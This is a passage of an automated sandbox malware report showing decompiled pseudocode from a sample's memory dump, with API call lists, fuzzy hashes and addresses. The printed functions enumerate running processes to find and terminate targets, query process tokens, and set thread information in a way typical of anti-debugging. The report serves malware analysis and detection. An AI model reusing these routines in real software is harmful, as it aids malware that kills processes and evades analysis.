                						 *((intOrPtr*)(_t45 + 0x10)) = 0;
                						 *((intOrPtr*)(_t45 + 0x14)) = 0;
                						_push( &_v24);
                						_push( &_v48);
                						_push(1);
                						_push( &_v8);
                						if( *0x1101304() == 0) {
                							 *0x110134c(_v8, 0);
                							 *0x1101354(_v8);
                						}
                					}
                					_t44 = _t44 + _t46;
                				} while (_t46 != 0);
                				return E010F5FB3(_v16);
                				goto L13;
                			}














                0x010f73c9
                0x010f73d8
                0x010f73db
                0x010f73e7
                0x010f73ef
                0x00000000
                0x00000000
                0x010f73fa
                0x010f741b
                0x010f73fc
                0x010f7402
                0x010f7407
                0x00000000
                0x010f7407
                0x00000000
                0x010f73fa
                0x010f741e
                0x010f7421
                0x010f7421
                0x010f7427
                0x010f7438
                0x010f743b
                0x010f7442
                0x010f7445
                0x010f744b
                0x010f7452
                0x010f7459
                0x010f7460
                0x010f7467
                0x010f7471
                0x010f7475
                0x010f7476
                0x010f747b
                0x010f7484
                0x010f748b
                0x010f7494
                0x010f7494
                0x010f7484
                0x010f749a
                0x010f749d
                0x010f74ae
                0x00000000

                APIs
                  • Part of subcall function 010F5F98: RtlAllocateHeap.NTDLL(?,00000008,?,?,010F6457,00000014,?), ref: 010F5FA9
                • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400,?,00000000), ref: 010F73E7
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AllocateHeapInformationQuerySystem
                • String ID:
                • API String ID: 3114120137-0
                • Opcode ID: 861bbc97677469c24a0db85fb4d53ce23d09ce6bb490f0cfbcbc34122765f905
                • Instruction ID: cdd812a999585534dd820aa151173be79b0e6502ba55fa6da537deef99e9673f
                • Opcode Fuzzy Hash: 861bbc97677469c24a0db85fb4d53ce23d09ce6bb490f0cfbcbc34122765f905
                • Instruction Fuzzy Hash: 83215C71D00208BBDF129F94DC45BDEBBB8FF04314F2080E9EA14AA551DBB69A55CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 1aac8bf02960fb9f91dcf644d43652d8ba7c11310f4c78a9d984efab20f97f3c
                • Instruction ID: e8d69db4f8b0b4b9c7e611055480c594d28c1012fd98afd03b0e076cf4932824
                • Opcode Fuzzy Hash: 1aac8bf02960fb9f91dcf644d43652d8ba7c11310f4c78a9d984efab20f97f3c
                • Instruction Fuzzy Hash: 5F31D970C00208EFEB51CF94D859BDEBBF8FB04318F508099E510BA281D7BA9649DF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F7EA7(intOrPtr _a4) {
                				intOrPtr _v8;
                				long _v12;
                				void* _v16;
                				long _t24;
                				void* _t27;
                				intOrPtr* _t32;
                				intOrPtr _t33;
                
                				_v8 = 0;
                				_v12 = 0x400;
                				_v16 = E010F5F98(_v12);
                				while(1) {
                					_t24 = NtQuerySystemInformation(5, _v16, _v12,  &_v12); // executed
                					if(_t24 == 0) {
                						break;
                					}
                					if(_t24 != 0xc0000004) {
                						E010F5FB3(_v16);
                						return _v8;
                					} else {
                						_t27 = E010F5FCE(_v16, _v12); // executed
                						_v16 = _t27;
                						continue;
                					}
                					L12:
                				}
                				_t32 = _v16;
                				while(1) {
                					_t33 =  *_t32;
                					if( *((intOrPtr*)(_t32 + 0x3c)) != 0 && E010F10BB( *((intOrPtr*)(_t32 + 0x3c)), 0) == _a4) {
                						break;
                					}
                					_t32 = _t32 + _t33;
                					if(_t33 != 0) {
                						continue;
                					}
                					L11:
                					E010F5FB3(_v16);
                					return _v8;
                					goto L12;
                				}
                				_v8 =  *((intOrPtr*)(_t32 + 0x44));
                				goto L11;
                			}










                0x010f7eaf
                0x010f7eb6
                0x010f7ec5
                0x010f7ec8
                0x010f7ed4
                0x010f7edc
                0x00000000
                0x00000000
                0x010f7ee7
                0x010f7efe
                0x010f7f0b
                0x010f7ee9
                0x010f7eef
                0x010f7ef4
                0x00000000
                0x010f7ef4
                0x00000000
                0x010f7ee7
                0x010f7f10
                0x010f7f13
                0x010f7f13
                0x010f7f19
                0x00000000
                0x00000000
                0x010f7f32
                0x010f7f37
                0x00000000
                0x00000000
                0x010f7f39
                0x010f7f3c
                0x010f7f49
                0x00000000
                0x010f7f49
                0x010f7f2d
                0x00000000

                APIs
                  • Part of subcall function 010F5F98: RtlAllocateHeap.NTDLL(?,00000008,?,?,010F6457,00000014,?), ref: 010F5FA9
                • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 010F7ED4
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AllocateHeapInformationQuerySystem
                • String ID:
                • API String ID: 3114120137-0
                • Opcode ID: 3ff0712bbe921b184ac62dca8bdb873d713b4f045837dbca3f05353fdc81b164
                • Instruction ID: 8b8a53f6f147d3dc375b941d59e4bf16a7f87218ca7ce6926f1e0f861317fada
                • Opcode Fuzzy Hash: 3ff0712bbe921b184ac62dca8bdb873d713b4f045837dbca3f05353fdc81b164
                • Instruction Fuzzy Hash: FA114631D04109FBCF62DF94D882ADDBBB4EF04310F5081EAEA50A6A50D7725A549B91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryInformationToken.NTDLL(00000000,00000001,?,00000028,?,00000000), ref: 010F63DA
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationQueryToken
                • String ID:
                • API String ID: 4239771691-0
                • Opcode ID: dec367457ae0d32880439af350aec3d06cfc067fce74bbbc26df8dde0cc34fa7
                • Instruction ID: 6f6d26dc5398e410f4d1fd89f048f042662b6f847d2f6de252700981148b22d8
                • Opcode Fuzzy Hash: dec367457ae0d32880439af350aec3d06cfc067fce74bbbc26df8dde0cc34fa7
                • Instruction Fuzzy Hash: 38116D70904209FBEF11DF94DC89BEEBBB8FB04304F108169FA51A6590DBB69698CB11
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E010F73F3() {
                				long _t28;
                				void* _t30;
                				void* _t41;
                				intOrPtr* _t43;
                				void _t45;
                				void* _t47;
                
                				while(1) {
                					_t28 = NtQuerySystemInformation(5,  *(_t47 - 0xc),  *(_t47 - 8), _t47 - 8); // executed
                					if(_t28 == 0) {
                						break;
                					}
                					if(_t28 != 0xc0000004) {
                						return E010F5FB3( *(_t47 - 0xc));
                					} else {
                						_t30 = E010F5FCE( *(_t47 - 0xc),  *(_t47 - 8)); // executed
                						 *(_t47 - 0xc) = _t30;
                						continue;
                					}
                					L14:
                				}
                				_t41 =  *(_t47 - 0xc);
                				do {
                					_t45 =  *_t41;
                					if( *((intOrPtr*)(_t41 + 0x3c)) != 0 && E010F74AF( *((intOrPtr*)(_t41 + 0x3c))) != 0) {
                						 *((intOrPtr*)(_t47 - 0x14)) =  *((intOrPtr*)(_t41 + 0x44));
                						 *((intOrPtr*)(_t47 - 0x10)) = 0;
                						_t43 = _t47 - 0x2c;
                						 *_t43 = 0x18;
                						 *((intOrPtr*)(_t43 + 4)) = 0;
                						 *((intOrPtr*)(_t43 + 8)) = 0;
                						 *((intOrPtr*)(_t43 + 0xc)) = 0;
                						 *((intOrPtr*)(_t43 + 0x10)) = 0;
                						 *((intOrPtr*)(_t43 + 0x14)) = 0;
                						_push(_t47 - 0x14);
                						_push(_t47 - 0x2c);
                						_push(1);
                						_push(_t47 - 4);
                						if( *0x1101304() == 0) {
                							 *0x110134c( *((intOrPtr*)(_t47 - 4)), 0);
                							 *0x1101354( *((intOrPtr*)(_t47 - 4)));
                						}
                					}
                					_t41 = _t41 + _t45;
                				} while (_t45 != 0);
                				return E010F5FB3( *(_t47 - 0xc));
                				goto L14;
                			}









                0x010f73db
                0x010f73e7
                0x010f73ef
                0x00000000
                0x00000000
                0x010f73fa
                0x010f741b
                0x010f73fc
                0x010f7402
                0x010f7407
                0x00000000
                0x010f7407
                0x00000000
                0x010f73fa
                0x010f741e
                0x010f7421
                0x010f7421
                0x010f7427
                0x010f7438
                0x010f743b
                0x010f7442
                0x010f7445
                0x010f744b
                0x010f7452
                0x010f7459
                0x010f7460
                0x010f7467
                0x010f7471
                0x010f7475
                0x010f7476
                0x010f747b
                0x010f7484
                0x010f748b
                0x010f7494
                0x010f7494
                0x010f7484
                0x010f749a
                0x010f749d
                0x010f74ae
                0x00000000

                APIs
                • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400,?,00000000), ref: 010F73E7
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationQuerySystem
                • String ID:
                • API String ID: 3562636166-0
                • Opcode ID: 8ef95eff2326f53a16c5a276e3b4c75a0b4ab0d42dc371f2b19452bdd40e7073
                • Instruction ID: a5cd8aa520cea5dd3c44fbd4162dfcf4b32a7d01cadd066a436b7f57ceaec450
                • Opcode Fuzzy Hash: 8ef95eff2326f53a16c5a276e3b4c75a0b4ab0d42dc371f2b19452bdd40e7073
                • Instruction Fuzzy Hash: 15115E31900208EBEF56CF94C885BDEBBB8FF04304F20809DEA15AA541DBB6D645CF92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E010F740C() {
                				long _t28;
                				void* _t30;
                				void* _t41;
                				intOrPtr* _t43;
                				void _t45;
                				void* _t47;
                
                				while(1) {
                					_t28 = NtQuerySystemInformation(5,  *(_t47 - 0xc),  *(_t47 - 8), _t47 - 8); // executed
                					if(_t28 == 0) {
                						break;
                					}
                					if(_t28 != 0xc0000004) {
                						return E010F5FB3( *(_t47 - 0xc));
                					} else {
                						_t30 = E010F5FCE( *(_t47 - 0xc),  *(_t47 - 8)); // executed
                						 *(_t47 - 0xc) = _t30;
                						continue;
                					}
                					L14:
                				}
                				_t41 =  *(_t47 - 0xc);
                				do {
                					_t45 =  *_t41;
                					if( *((intOrPtr*)(_t41 + 0x3c)) != 0 && E010F74AF( *((intOrPtr*)(_t41 + 0x3c))) != 0) {
                						 *((intOrPtr*)(_t47 - 0x14)) =  *((intOrPtr*)(_t41 + 0x44));
                						 *((intOrPtr*)(_t47 - 0x10)) = 0;
                						_t43 = _t47 - 0x2c;
                						 *_t43 = 0x18;
                						 *((intOrPtr*)(_t43 + 4)) = 0;
                						 *((intOrPtr*)(_t43 + 8)) = 0;
                						 *((intOrPtr*)(_t43 + 0xc)) = 0;
                						 *((intOrPtr*)(_t43 + 0x10)) = 0;
                						 *((intOrPtr*)(_t43 + 0x14)) = 0;
                						_push(_t47 - 0x14);
                						_push(_t47 - 0x2c);
                						_push(1);
                						_push(_t47 - 4);
                						if( *0x1101304() == 0) {
                							 *0x110134c( *((intOrPtr*)(_t47 - 4)), 0);
                							 *0x1101354( *((intOrPtr*)(_t47 - 4)));
                						}
                					}
                					_t41 = _t41 + _t45;
                				} while (_t45 != 0);
                				return E010F5FB3( *(_t47 - 0xc));
                				goto L14;
                			}









                0x010f73db
                0x010f73e7
                0x010f73ef
                0x00000000
                0x00000000
                0x010f73fa
                0x010f741b
                0x010f73fc
                0x010f7402
                0x010f7407
                0x00000000
                0x010f7407
                0x00000000
                0x010f73fa
                0x010f741e
                0x010f7421
                0x010f7421
                0x010f7427
                0x010f7438
                0x010f743b
                0x010f7442
                0x010f7445
                0x010f744b
                0x010f7452
                0x010f7459
                0x010f7460
                0x010f7467
                0x010f7471
                0x010f7475
                0x010f7476
                0x010f747b
                0x010f7484
                0x010f748b
                0x010f7494
                0x010f7494
                0x010f7484
                0x010f749a
                0x010f749d
                0x010f74ae
                0x00000000

                APIs
                • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400,?,00000000), ref: 010F73E7
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationQuerySystem
                • String ID:
                • API String ID: 3562636166-0
                • Opcode ID: 1ec34f3e31e54929a9346c1bc815caa7c1250a32ea4273479dd3b6e3eedaf70e
                • Instruction ID: a5cd8aa520cea5dd3c44fbd4162dfcf4b32a7d01cadd066a436b7f57ceaec450
                • Opcode Fuzzy Hash: 1ec34f3e31e54929a9346c1bc815caa7c1250a32ea4273479dd3b6e3eedaf70e
                • Instruction Fuzzy Hash: 15115E31900208EBEF56CF94C885BDEBBB8FF04304F20809DEA15AA541DBB6D645CF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtSetInformationThread.NTDLL(?,00000005,?,00000004), ref: 010F87CA
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationThread
                • String ID:
                • API String ID: 4046476035-0
                • Opcode ID: 5acca891762267d6ef2e294dffd07a405cea15d5a0da88451b733682d883f97d
                • Instruction ID: f4cd923bf8d2605796041623d16c4f98efb34862447a3568e372dc461ba80df3
                • Opcode Fuzzy Hash: 5acca891762267d6ef2e294dffd07a405cea15d5a0da88451b733682d883f97d
                • Instruction Fuzzy Hash: D8014471504308EFE711CF50CC89FEABBE8FB00714F50C1A9EA149A591E7B5CA58DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryInformationToken.NTDLL(?,00000001,?,0000002C,?), ref: 010F94BE
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationQueryToken
                • String ID:
                • API String ID: 4239771691-0
                • Opcode ID: d17f4b7d5d31789d7a42214030e9a63f392dd6dae375983750483065b67dfe53
                • Instruction ID: a508e0d74e409071f4ca54d0e3f3c6eabe3d0c837698e7e860310a6fa2cf7dbf
                • Opcode Fuzzy Hash: d17f4b7d5d31789d7a42214030e9a63f392dd6dae375983750483065b67dfe53
                • Instruction Fuzzy Hash: 37F09031A04108BFEB21DA94DC85FEDB7ADFB04324F5001B5FA10D6691E7A5AA448B10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F7EE0() {
                				long _t19;
                				void* _t22;
                				void* _t28;
                				void _t31;
                				void* _t33;
                
                				while(1) {
                					_t19 = NtQuerySystemInformation(5,  *(_t33 - 0xc),  *(_t33 - 8), _t33 - 8); // executed
                					if(_t19 == 0) {
                						break;
                					}
                					if(_t19 != 0xc0000004) {
                						E010F5FB3( *(_t33 - 0xc));
                						return  *((intOrPtr*)(_t33 - 4));
                					} else {
                						_t22 = E010F5FCE( *(_t33 - 0xc),  *(_t33 - 8)); // executed
                						 *(_t33 - 0xc) = _t22;
                						continue;
                					}
                					L13:
                				}
                				_t28 =  *(_t33 - 0xc);
                				while(1) {
                					_t31 =  *_t28;
                					if( *((intOrPtr*)(_t28 + 0x3c)) != 0 && E010F10BB( *((intOrPtr*)(_t28 + 0x3c)), 0) ==  *((intOrPtr*)(_t33 + 8))) {
                						break;
                					}
                					_t28 = _t28 + _t31;
                					if(_t31 != 0) {
                						continue;
                					}
                					L12:
                					E010F5FB3( *(_t33 - 0xc));
                					return  *((intOrPtr*)(_t33 - 4));
                					goto L13;
                				}
                				 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t28 + 0x44));
                				goto L12;
                			}








                0x010f7ec8
                0x010f7ed4
                0x010f7edc
                0x00000000
                0x00000000
                0x010f7ee7
                0x010f7efe
                0x010f7f0b
                0x010f7ee9
                0x010f7eef
                0x010f7ef4
                0x00000000
                0x010f7ef4
                0x00000000
                0x010f7ee7
                0x010f7f10
                0x010f7f13
                0x010f7f13
                0x010f7f19
                0x00000000
                0x00000000
                0x010f7f32
                0x010f7f37
                0x00000000
                0x00000000
                0x010f7f39
                0x010f7f3c
                0x010f7f49
                0x00000000
                0x010f7f49
                0x010f7f2d
                0x00000000

                APIs
                • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 010F7ED4
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationQuerySystem
                • String ID:
                • API String ID: 3562636166-0
                • Opcode ID: 3f1c5d67402cf8e345c13dc43461afa186bf1d0a16dd3fa4f359bbd2844698af
                • Instruction ID: b634ff1ba26f9f534a668be163d4306835287fe573b458baef1c3dedc8e9b1b8
                • Opcode Fuzzy Hash: 3f1c5d67402cf8e345c13dc43461afa186bf1d0a16dd3fa4f359bbd2844698af
                • Instruction Fuzzy Hash: 82F05E35A44108FBCF52DF84D882BACBBB4FF18300F5044DAEB81AA955C3719954DF92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F7EF9() {
                				long _t19;
                				void* _t22;
                				void* _t28;
                				void _t31;
                				void* _t33;
                
                				while(1) {
                					_t19 = NtQuerySystemInformation(5,  *(_t33 - 0xc),  *(_t33 - 8), _t33 - 8); // executed
                					if(_t19 == 0) {
                						break;
                					}
                					if(_t19 != 0xc0000004) {
                						E010F5FB3( *(_t33 - 0xc));
                						return  *((intOrPtr*)(_t33 - 4));
                					} else {
                						_t22 = E010F5FCE( *(_t33 - 0xc),  *(_t33 - 8)); // executed
                						 *(_t33 - 0xc) = _t22;
                						continue;
                					}
                					L13:
                				}
                				_t28 =  *(_t33 - 0xc);
                				while(1) {
                					_t31 =  *_t28;
                					if( *((intOrPtr*)(_t28 + 0x3c)) != 0 && E010F10BB( *((intOrPtr*)(_t28 + 0x3c)), 0) ==  *((intOrPtr*)(_t33 + 8))) {
                						break;
                					}
                					_t28 = _t28 + _t31;
                					if(_t31 != 0) {
                						continue;
                					}
                					L12:
                					E010F5FB3( *(_t33 - 0xc));
                					return  *((intOrPtr*)(_t33 - 4));
                					goto L13;
                				}
                				 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t28 + 0x44));
                				goto L12;
                			}








                0x010f7ec8
                0x010f7ed4
                0x010f7edc
                0x00000000
                0x00000000
                0x010f7ee7
                0x010f7efe
                0x010f7f0b
                0x010f7ee9
                0x010f7eef
                0x010f7ef4
                0x00000000
                0x010f7ef4
                0x00000000
                0x010f7ee7
                0x010f7f10
                0x010f7f13
                0x010f7f13
                0x010f7f19
                0x00000000
                0x00000000
                0x010f7f32
                0x010f7f37
                0x00000000
                0x00000000
                0x010f7f39
                0x010f7f3c
                0x010f7f49
                0x00000000
                0x010f7f49
                0x010f7f2d
                0x00000000

                APIs
                • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 010F7ED4
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationQuerySystem
                • String ID:
                • API String ID: 3562636166-0
                • Opcode ID: 9a343f4c17a04f7fabf104afdf113c394fc84d01ae36bbd256836bb6d668f10e
                • Instruction ID: b634ff1ba26f9f534a668be163d4306835287fe573b458baef1c3dedc8e9b1b8
                • Opcode Fuzzy Hash: 9a343f4c17a04f7fabf104afdf113c394fc84d01ae36bbd256836bb6d668f10e
                • Instruction Fuzzy Hash: 82F05E35A44108FBCF52DF84D882BACBBB4FF18300F5044DAEB81AA955C3719954DF92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F92E1(void* _a4) {
                				void* _t8;
                				long _t9;
                
                				if(_a4 != 0) {
                					_t8 = _a4;
                				} else {
                					_t8 =  ~0x00000002;
                				}
                				_t9 = NtSetInformationThread(_t8, 9, 0, 0); // executed
                				return _t9;
                			}





                0x010f92f3
                0x010f92f9
                0x010f92f5
                0x010f92f5
                0x010f92f5
                0x010f9302
                0x010f9309

                APIs
                • NtSetInformationThread.NTDLL(00000000,?,00000000,00000000,?,010FE8E1,00000000), ref: 010F9302
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: InformationThread
                • String ID:
                • API String ID: 4046476035-0
                • Opcode ID: 27d231dfa3dfcf67d71e77d22f5b745cbd53a1bcb33ca39648f5c5085e8bd1af
                • Instruction ID: 018f20f4f4c367e78ffc9d72c82608e711e20e763b6800fbbab2f3ea1811d850
                • Opcode Fuzzy Hash: 27d231dfa3dfcf67d71e77d22f5b745cbd53a1bcb33ca39648f5c5085e8bd1af
                • Instruction Fuzzy Hash: 15D0A73669020CBED7109B58EC86FF633ACD304309F404128B343C9480D6B4F490C654
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F5FCE(void* _a4, long _a8) {
                				void* _t5;
                
                				_t5 = RtlReAllocateHeap( *( *[fs:0x30] + 0x18), 8, _a4, _a8); // executed
                				return _t5;
                			}




                0x010f5fe2
                0x010f5fe9

                APIs
                • RtlReAllocateHeap.NTDLL(?,00000008,?,00000400,?,010F7EF4,?,00000400), ref: 010F5FE2
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e1ec26a63599902151f357fd1673f0f046133a366a663b3d7e90f11a0cadce44
                • Instruction ID: cffe97acde7f3d282971053b53d2f478453a4db64692a0d1d1ea0a9f49492f97
                • Opcode Fuzzy Hash: e1ec26a63599902151f357fd1673f0f046133a366a663b3d7e90f11a0cadce44
                • Instruction Fuzzy Hash: 7CC01232080648FBCB126F84D940E847B69FB28B00F008020B6054A461C676E960EB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F8C6E(WCHAR** _a4) {
                				int _t6;
                
                				_t6 = GetDiskFreeSpaceExW( *_a4, _a4[1],  *(_t5 + 8),  *(_t5 + 0xc)); // executed
                				return _t6;
                			}




                0x010f8c7f
                0x010f8c86

                APIs
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 010F8C7F
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: DiskFreeSpace
                • String ID:
                • API String ID: 1705453755-0
                • Opcode ID: bbc7e4ae8c72ec1d1797ae841e408d0b6833eddce743ba7644452bdf26604e50
                • Instruction ID: 744290b8668f872e1fa6dde7f66843e6d82f429002e8e82765289c02c87b9304
